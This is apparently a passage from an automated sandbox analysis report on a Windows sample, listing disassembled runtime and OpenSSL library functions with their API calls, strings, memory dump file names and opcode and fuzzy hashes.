                                                                                                                            • Instruction ID: ca6944bc949019f202863d08ba26eb14c31e2e8531f725297b27a775bf5e9a09
                                                                                                                            • Opcode Fuzzy Hash: def75f6cb6d0d672af9e4d6134873646e57e7698413cfa20c796f933f604dfc0
                                                                                                                            • Instruction Fuzzy Hash: 0E015BB1502B00E6DA34BBA9D846B1E72A06F00739F604E5FE4646A2D5CFBC9980DB5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B73F0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __aulldvrm
                                                                                                                            • String ID: $+$0123456789ABCDEF$UlK
                                                                                                                            • API String ID: 1302938615-392471189
                                                                                                                            • Opcode ID: dce93e00dbe434c578cd0a3cec7124c6329c8a5fd6c7f05eb1ebf6821a20af9a
                                                                                                                            • Instruction ID: 5d79033a0d1641cee28c1ec0bcd5030b108edf4232128083af2b5817aebdf2d9
                                                                                                                            • Opcode Fuzzy Hash: dce93e00dbe434c578cd0a3cec7124c6329c8a5fd6c7f05eb1ebf6821a20af9a
                                                                                                                            • Instruction Fuzzy Hash: 74818DB1A087509FD720CF298840A6BBBE5BFC8754F15091EF989A3352D338DD058BA6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004B06A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ___from_strstr_to_strchr.LIBCMT ref: 004B07C3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ___from_strstr_to_strchr
                                                                                                                            • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                                            • API String ID: 601868998-2416195885
                                                                                                                            • Opcode ID: 984a5882fba86864009996f49346ea0bdf88ef3a56d77961d231db0fbdd02bea
                                                                                                                            • Instruction ID: 8a5badbd6d10ce0d3b27618c4de3becb9d81d01ee054be2f893b7bfdee36208f
                                                                                                                            • Opcode Fuzzy Hash: 984a5882fba86864009996f49346ea0bdf88ef3a56d77961d231db0fbdd02bea
                                                                                                                            • Instruction Fuzzy Hash: 3641E771A043059BDB24EE15CC45BEFB7D8EF85349F00082FF58593241EA79E9098BB6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004BAE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _memset
                                                                                                                            • String ID: .\crypto\buffer\buffer.c$g9L
                                                                                                                            • API String ID: 2102423945-957670896
                                                                                                                            • Opcode ID: 17f1ebc54ed39b968f6035c0df2cf15f5b91dbb67fd3db8f6bda8d49f181cf43
                                                                                                                            • Instruction ID: 7dc351e9e75f57ed17621435b292e6d8d9c7ecc1bf5e76977484c5a99075eabc
                                                                                                                            • Opcode Fuzzy Hash: 17f1ebc54ed39b968f6035c0df2cf15f5b91dbb67fd3db8f6bda8d49f181cf43
                                                                                                                            • Instruction Fuzzy Hash: 352106B6B403213FE214665DFC42B96B399EB84B18F10442AF208D72C2D374E821C3E9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00525D39 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 100COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getptd_noexit.LIBCMT ref: 00525D3D
                                                                                                                              • Part of subcall function 0048501F: GetLastError.KERNEL32(00000001,00000000,0048520D,00480CE9,?,?,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00485021
                                                                                                                              • Part of subcall function 0048501F: __calloc_crt.LIBCMT ref: 00485042
                                                                                                                              • Part of subcall function 0048501F: __initptd.LIBCMT ref: 00485064
                                                                                                                              • Part of subcall function 0048501F: GetCurrentThreadId.KERNEL32 ref: 0048506B
                                                                                                                              • Part of subcall function 0048501F: SetLastError.KERNEL32(00000000,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00485083
                                                                                                                            • __calloc_crt.LIBCMT ref: 00525D60
                                                                                                                            • __get_sys_err_msg.LIBCMT ref: 00525D7E
                                                                                                                            • __get_sys_err_msg.LIBCMT ref: 00525DCD
                                                                                                                            Strings
                                                                                                                            • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00525D48, 00525D6E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast__calloc_crt__get_sys_err_msg$CurrentThread__getptd_noexit__initptd
                                                                                                                            • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                                                                                            • API String ID: 3123740607-798102604
                                                                                                                            • Opcode ID: fde893ec371491eb85b18ef26a26a6ad5d2eeb319d9bd56ae6f087a2f6bc219d
                                                                                                                            • Instruction ID: 0b4f772ee93538a19ccd2b473515f8b46fe559c533960dc63fdf19f0a1aaaaa0
                                                                                                                            • Opcode Fuzzy Hash: fde893ec371491eb85b18ef26a26a6ad5d2eeb319d9bd56ae6f087a2f6bc219d
                                                                                                                            • Instruction Fuzzy Hash: 4511B671541E256BEB213B76AC05ABF7BDCFF427A4F10086AFE0596281F6359E0043E5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004C2FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _fprintf_memset
                                                                                                                            • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                                                            • API String ID: 3021507156-3399676524
                                                                                                                            • Opcode ID: 8c6ff673101b8582d0267358946e3e18b3e12956234ee078753d4f21bfe3f403
                                                                                                                            • Instruction ID: 369716b1bf070bcdf10903e5072480642b3b08e19738a687f3b07712abc9855d
                                                                                                                            • Opcode Fuzzy Hash: 8c6ff673101b8582d0267358946e3e18b3e12956234ee078753d4f21bfe3f403
                                                                                                                            • Instruction Fuzzy Hash: C8215B76A443113BE720A9275C02FBB7799DFC1B9CF04481EFE50672C6D625DD0642B9
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004A16EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __getenv_helper_nolock.LIBCMT ref: 004A1726
                                                                                                                            • _strlen.LIBCMT ref: 004A1734
                                                                                                                              • Part of subcall function 00485208: __getptd_noexit.LIBCMT ref: 00485208
                                                                                                                            • _strnlen.LIBCMT ref: 004A17BF
                                                                                                                            • __lock.LIBCMT ref: 004A17D0
                                                                                                                            • __getenv_helper_nolock.LIBCMT ref: 004A17DB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2168648987-0
                                                                                                                            • Opcode ID: 5fca748596b5a98dbbca5436f3bdb1c05904b40e312e46e2221f73c222cfcaac
                                                                                                                            • Instruction ID: 84d36f6f7b23f9a605ec562353b62274fdcdd37fd3cb2a3fc24995b5777e5858
                                                                                                                            • Opcode Fuzzy Hash: 5fca748596b5a98dbbca5436f3bdb1c05904b40e312e46e2221f73c222cfcaac
                                                                                                                            • Instruction Fuzzy Hash: 4B31593AA04225ABDB217BB9CC01BAF37949F22B64F14051BF814DB391DF7C880087AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0049B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _malloc.LIBCMT ref: 0049B70B
                                                                                                                              • Part of subcall function 00480C62: __FF_MSGBANNER.LIBCMT ref: 00480C79
                                                                                                                              • Part of subcall function 00480C62: __NMSG_WRITE.LIBCMT ref: 00480C80
                                                                                                                              • Part of subcall function 00480C62: RtlAllocateHeap.NTDLL(00A30000,00000000,00000001,00000001,?,?,?,00490E81,00000001,00000000,?,?,?,00490D1A,004AF284,?), ref: 00480CA5
                                                                                                                            • _free.LIBCMT ref: 0049B71E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap_free_malloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1020059152-0
                                                                                                                            • Opcode ID: aa7ba2753989eac8a99e813a82520e4a1b1d28ee97a879ceeff1ea1536972a8c
                                                                                                                            • Instruction ID: fae7b0904c1cca2fb82f650d6bc482dc71516e53d9326d8cef4e01f4f0427edd
                                                                                                                            • Opcode Fuzzy Hash: aa7ba2753989eac8a99e813a82520e4a1b1d28ee97a879ceeff1ea1536972a8c
                                                                                                                            • Instruction Fuzzy Hash: 2611C432408615ABCF203BF5B985A5E3EC8DF51364B100BBBF85896251DF3C88409BD8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0047F085
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047F0AC
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047F0B6
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047F0C4
                                                                                                                            • WaitForSingleObject.KERNEL32(0000000A), ref: 0047F0D2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: 89dba03d18b4bdcc32a07d0745b9af22508b7246dcbde30d5257c87026a802d6
                                                                                                                            • Instruction ID: a32a788c75e48d68059082e63f6abf7ec19649cae72bad030ca90558325a2686
                                                                                                                            • Opcode Fuzzy Hash: 89dba03d18b4bdcc32a07d0745b9af22508b7246dcbde30d5257c87026a802d6
                                                                                                                            • Instruction Fuzzy Hash: 1901DB35640308B6E730DB55EC46F9A3B6CEB64B10F108421FA04AB2D3D7B5A54DFBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0047E515
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047E53C
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047E546
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047E554
                                                                                                                            • WaitForSingleObject.KERNEL32(0000000A), ref: 0047E562
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: aa70838de973720e6f2559b6d3013faaa1ee0830c32d3f9b16a14085bd2562cf
                                                                                                                            • Instruction ID: f073d1624d2ce1809fa69f46634a6e6988ebb60ea847fdf7871033eb0211a217
                                                                                                                            • Opcode Fuzzy Hash: aa70838de973720e6f2559b6d3013faaa1ee0830c32d3f9b16a14085bd2562cf
                                                                                                                            • Instruction Fuzzy Hash: 8B017B3474030976E730DB51EC46F9A7B6DEB58B14F104441FA04AB1D2D6F4A54EE7D4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0047FA53
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FA71
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047FA7B
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FA89
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0047FA94
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: 701b36f0d1213a79df62d3c62478b3f197dfdf9605a95893632c59937c2449ee
                                                                                                                            • Instruction ID: 397fdd5335d02129c38b8e0f6292f733a436b156887340f9a041782fd1965de3
                                                                                                                            • Opcode Fuzzy Hash: 701b36f0d1213a79df62d3c62478b3f197dfdf9605a95893632c59937c2449ee
                                                                                                                            • Instruction Fuzzy Hash: D5018631B40309B7EB309B54DC4AFAB3F6CAB59B40F548461FA04AE1D2D7F5A80986A4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0047FDF0 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0047FE03
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FE21
                                                                                                                            • DispatchMessageW.USER32(?), ref: 0047FE2B
                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0047FE39
                                                                                                                            • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0047FE44
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000002.00000002.2385064890.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                            • Associated: 00000002.00000002.2385023607.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385154672.000000000052C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385216550.000000000056A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385259370.000000000056C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000570000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385299347.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000002.00000002.2385419748.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_2_2_460000_3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_paylo.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1380987712-0
                                                                                                                            • Opcode ID: 701b36f0d1213a79df62d3c62478b3f197dfdf9605a95893632c59937c2449ee
                                                                                                                            • Instruction ID: aead49e14035084006ce4a1c5c845b54f10400c50ee4d561ec8828ced85e7812
                                                                                                                            • Opcode Fuzzy Hash: 701b36f0d1213a79df62d3c62478b3f197dfdf9605a95893632c59937c2449ee
                                                                                                                            • Instruction Fuzzy Hash: F401D631B40308B7EB309B94DC4AF9B3F6CEF59B40F008421FA04AE1D2D7F5A80986A4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

